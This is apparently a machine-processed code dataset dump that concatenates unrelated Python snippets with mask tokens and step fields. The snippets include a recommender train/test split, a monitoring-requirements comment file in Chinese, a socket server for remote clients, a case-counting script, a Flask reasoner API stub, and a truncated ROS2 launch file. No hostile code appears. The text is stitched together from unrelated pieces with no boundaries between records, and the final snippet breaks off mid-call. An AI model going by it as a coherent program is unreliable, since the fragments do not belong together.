"step-2": "<mask token>\n\n\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n df['new_col'] = ranks / counts > 0.8\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n train.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\training.csv'\n , header=False, index=False)\n test.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\testing.csv'\n , header=False, index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n df['new_col'] = ranks / counts > 0.8\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n train.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\training.csv'\n , header=False, index=False)\n test.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\testing.csv'\n , header=False, index=False)\n\n\nsplit_data(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\ratings.csv')\n",
"step-4": "import matplotlib.pyplot as plt\nimport pandas as pd\nfrom collections import Counter\nimport numpy as np\nimport imdb\nimport csv\nimport networkx as nx\nfrom networkx import *\n\n\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n df['new_col'] = ranks / counts > 0.8\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n train.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\training.csv'\n , header=False, index=False)\n test.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\testing.csv'\n , header=False, index=False)\n\n\nsplit_data(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\ratings.csv')\n",
"step-5": "import matplotlib.pyplot as plt\nimport pandas as pd\nfrom collections import Counter\nimport numpy as np\nimport imdb\nimport csv\nimport networkx as nx\nfrom networkx import *\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n # myes = (ranks / counts) > 0.8\n df['new_col'] = (ranks / counts) > 0.8\n # print(myes)\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n\n train.to_csv(r'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv', header=False, index=False)\n test.to_csv(r'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv', header=False, index=False)\n\n # print(test.head())\n\n\n # ----AND THEN SAVE THOSE AS CSV----\n\n # for row in df.index\n # print(test_train)\n # print(ranks.head())\n # print(counts.head())\n\n\n\n# def make_train_or_test_txt(ratingdata):\n# df = pd.read_csv(ratingdata)\n# users = []\n# [users.append(x) for x in df[\"userId\"] if x not in users]\n# print(users)\n# with open('Data/KGAT/train.txt', 'w') as f:\n# # writer = csv.writer(f, delimiter='\\t')\n# for x in users:\n# items = []\n# items = df.query('userId == {}'.format(x))[\"movieId\"]\n# items = items.values.tolist()\n# stringerbell = ''.join((str(e) + \"\\t\") for e in items)\n# print(stringerbell)\n# # writer.writerow(\"{}{}\".format(x, items))\n# # writer.writerow(str(x) + stringerbell)\n# f.write(str(x) + \"\\t\" + stringerbell + \"\\n\")\n# # print(items)\n# # for j in range(len(df)):\n# # try:\n# # getitems = [x for x in df.loc[df[\"movieId\"]]]\n# # except:\n# # continue\n# print(df.head())\n\n\n\n\n\n# make_train_or_test_txt('Data/ratings.csv')\nsplit_data('C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\ratings.csv')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python
#_*_ coding:utf-8 _*_
'''
@author: tanglei
@contact: tanglei_0315@163.com
@file: index.py
@time: 2017/11/1 16:26
'''
#需求:
#1.每个客户端需要监控的服务不同
#2.每个服务的监控间隔不同
#3.允许模板的形式批量修改监控指标
#4.不同设备的监控阀值不同
#5.可自定义最近n分钟内hit\max\avg\last\... 指标超过阀值
#6.报警策略,报警等级,报警自动升级
#7.历史数据的存储和优化 时间越久数据越失真
#8.跨机房,跨区域代理服务器
#第三方的socket框架:twisted
|
flexible
|
{
"blob_id": "886101e5d86daf6c2ac0fe92b361ccca6132b1aa",
"index": 3030,
"step-1": "<mask token>\n",
"step-2": "#!/usr/bin/env python\n#_*_ coding:utf-8 _*_\n'''\n@author: tanglei\n@contact: tanglei_0315@163.com\n@file: index.py\n@time: 2017/11/1 16:26\n'''\n#需求:\n#1.每个客户端需要监控的服务不同\n#2.每个服务的监控间隔不同\n#3.允许模板的形式批量修改监控指标\n#4.不同设备的监控阀值不同\n#5.可自定义最近n分钟内hit\\max\\avg\\last\\... 指标超过阀值\n#6.报警策略,报警等级,报警自动升级\n#7.历史数据的存储和优化 时间越久数据越失真\n#8.跨机房,跨区域代理服务器\n#第三方的socket框架:twisted\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import socket
from Server.MachineClient.Identification import Identification
from Server.SQL import DataBase
import threading
import time
from Server.Connection.AcceptClients import Accept
from Server.Connection.ConnectionCheck import ConnectionCheck
from Server.Clients_Data import Clients
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(r"C:\Users\user\Documents\RemoteControl\Server\pythonsqlite.db")
self.data = ""
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print("connection")
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
# c[1].send()
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
# connection = threading.Thread(target=self.connection)
# connection.start()
if __name__ == "__main__":
server = MachineClient("localhost", 8080)
server.start()
|
normal
|
{
"blob_id": "ff1bb2634ffec6181a42c80a4b2a19c2c27a8f9f",
"index": 3136,
"step-1": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n <mask token>\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-4": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-5": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(r\"C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db\")\n self.data = \"\"\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print(\"connection\")\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n # c[1].send()\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n\n accept = threading.Thread(target=self.accept)\n accept.start()\n\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n # connection = threading.Thread(target=self.connection)\n # connection.start()\n\n\nif __name__ == \"__main__\":\n server = MachineClient(\"localhost\", 8080)\n server.start()\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for line in sys.stdin:
lower = 0
upper = 0
for x in range(0, len(line)):
if 'a' <= line[x] <= 'z':
lower = lower + 1
elif 'A' <= line[x] <= 'Z':
upper = upper + 1
if lower == upper:
print('true')
else:
print('false')
<|reserved_special_token_1|>
import sys
<|reserved_special_token_0|>
for line in sys.stdin:
lower = 0
upper = 0
for x in range(0, len(line)):
if 'a' <= line[x] <= 'z':
lower = lower + 1
elif 'A' <= line[x] <= 'Z':
upper = upper + 1
if lower == upper:
print('true')
else:
print('false')
<|reserved_special_token_1|>
import sys
'''
Given a string, does the string contain an equal number of uppercase and
lowercase letters? Ignore whitespace, numbers, and punctuation. Return the
string “true” if balanced or the string “false” if not balanced.
'''
for line in sys.stdin:
lower = 0
upper = 0
# Count number of lowercase and uppercase letters
for x in range(0, len(line)):
if 'a' <= line[x] <= 'z':
lower = lower + 1
elif 'A' <= line[x] <= 'Z':
upper = upper + 1
# Determine if balanced or not
if lower == upper:
print('true')
else:
print('false')
# Repeat for each input line
|
flexible
|
{
"blob_id": "4b3664153940b064b424bd77de473a6409437f88",
"index": 3279,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n",
"step-3": "import sys\n<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n",
"step-4": "import sys\n\n'''\nGiven a string, does the string contain an equal number of uppercase and \nlowercase letters? Ignore whitespace, numbers, and punctuation. Return the \nstring “true” if balanced or the string “false” if not balanced.\n'''\nfor line in sys.stdin:\n lower = 0\n upper = 0\n\n # Count number of lowercase and uppercase letters\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n\n # Determine if balanced or not\n if lower == upper:\n print('true')\n else:\n print('false')\n\n # Repeat for each input line\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from flask import Flask, jsonify, make_response, request
app = Flask(__name__)
VERSION = (0, 1, 0)
VERSION_STRING = "{}.{}.{}".format(*VERSION)
LANG_ID = "lang.natural.english"
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route("/")
def entry():
return jsonify([{
"id": "com.natlang",
"name": "NatLang",
"website": "https://aaron.stockdill.nz/",
"version": VERSION_STRING,
"description": "A placeholder natural language reasoner.",
"icon": "",
"base": "http://aarons-macbook.local:5003/api/{}".format(VERSION_STRING),
"provides": {
"reason": "/reason",
"translate": "/translate"
}
}])
@app.route("/api/{}/reason".format(VERSION_STRING))
def reason_base():
return jsonify({
"result": "success",
"reasoning": [[LANG_ID, "manual", "reasonEnglish", "Manually reason with natural language."]]
})
def common_transform(json_data, key):
old_goal = json_data.get(key)
new_goal_data = json_data.get("extraInfo")
new_goal = old_goal.copy()
new_goal["data"] = new_goal_data
new_goal["language"] = LANG_ID
print(new_goal)
return new_goal
@app.route("/api/{}/reason/apply".format(VERSION_STRING), methods=["GET", "POST"])
def reason_apply():
rule_id = request.args.get("id")
if rule_id == "reasonEnglish":
json_data = request.get_json()
new_goal = common_transform(json_data, "goal")
return jsonify({
"result": "success",
"newGoals": [new_goal] if new_goal["data"] else []
})
else:
return jsonify({
"result": "failure",
"reason": "Unknown rule ID."
})
@app.route("/api/{}/translate".format(VERSION_STRING))
def translate_base():
other_languages = ["lang.speedith", "lang.isabelle"]
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield (x, y)
yield (y, x)
return jsonify({
"result": "success",
"translations": [(from_lang, to_lang, "manual")
for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]
})
@app.route("/api/{}/translate/translate".format(VERSION_STRING), methods=["GET", "POST"])
def translate_apply():
from_language = request.args.get("from")
to_language = request.args.get("to")
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, "formula")
return jsonify({
"result": "success",
"formula": new_goal
})
else:
return jsonify({
"result": "failure",
"reason": "Unable to translate when one of the languages is not {}".format(LANG_ID)
})
if __name__ == "__main__":
app.run()
|
normal
|
{
"blob_id": "49e1dc98ecc2e5c12c6e520721a6c0a7c2665cca",
"index": 3450,
"step-1": "<mask token>\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n<mask token>\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n<mask token>\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n@app.route('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-4": "from flask import Flask, jsonify, make_response, request\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n@app.route('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-5": "from flask import Flask, jsonify, make_response, request\n\n\napp = Flask(__name__)\n\nVERSION = (0, 1, 0)\nVERSION_STRING = \"{}.{}.{}\".format(*VERSION)\n\nLANG_ID = \"lang.natural.english\"\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route(\"/\")\ndef entry():\n return jsonify([{\n \"id\": \"com.natlang\",\n \"name\": \"NatLang\",\n \"website\": \"https://aaron.stockdill.nz/\",\n \"version\": VERSION_STRING,\n \"description\": \"A placeholder natural language reasoner.\",\n \"icon\": \"\",\n \"base\": \"http://aarons-macbook.local:5003/api/{}\".format(VERSION_STRING),\n \"provides\": {\n \"reason\": \"/reason\",\n \"translate\": \"/translate\"\n }\n }])\n\n\n@app.route(\"/api/{}/reason\".format(VERSION_STRING))\ndef reason_base():\n return jsonify({\n \"result\": \"success\",\n \"reasoning\": [[LANG_ID, \"manual\", \"reasonEnglish\", \"Manually reason with natural language.\"]]\n })\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get(\"extraInfo\")\n new_goal = old_goal.copy()\n new_goal[\"data\"] = new_goal_data\n new_goal[\"language\"] = LANG_ID\n print(new_goal)\n return new_goal\n\n\n@app.route(\"/api/{}/reason/apply\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef reason_apply():\n rule_id = request.args.get(\"id\")\n if rule_id == \"reasonEnglish\":\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"goal\")\n return jsonify({\n \"result\": \"success\",\n \"newGoals\": [new_goal] if new_goal[\"data\"] else []\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unknown rule ID.\"\n })\n\n\n@app.route(\"/api/{}/translate\".format(VERSION_STRING))\ndef translate_base():\n other_languages = [\"lang.speedith\", \"lang.isabelle\"]\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield (x, y)\n yield (y, x)\n return jsonify({\n \"result\": \"success\",\n \"translations\": [(from_lang, to_lang, \"manual\")\n for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]\n })\n\n\n@app.route(\"/api/{}/translate/translate\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef translate_apply():\n from_language = request.args.get(\"from\")\n to_language = request.args.get(\"to\")\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"formula\")\n return jsonify({\n \"result\": \"success\",\n \"formula\": new_goal\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unable to translate when one of the languages is not {}\".format(LANG_ID)\n })\n\nif __name__ == \"__main__\":\n app.run()\n",
"step-ids": [
4,
5,
9,
10,
11
]
}
|
[
4,
5,
9,
10,
11
] |
import os
from pathlib import Path
import shutil
from ament_index_python.packages import get_package_share_directory, get_package_prefix
import launch
import launch_ros.actions
def generate_launch_description():
cart_sdf = os.path.join(get_package_share_directory('crs_support'),
'sdf', 'cart.sdf')
cart_spawner = launch_ros.actions.Node(node_name='spawn_node', package=
'gazebo_ros', node_executable='spawn_entity.py', arguments=[
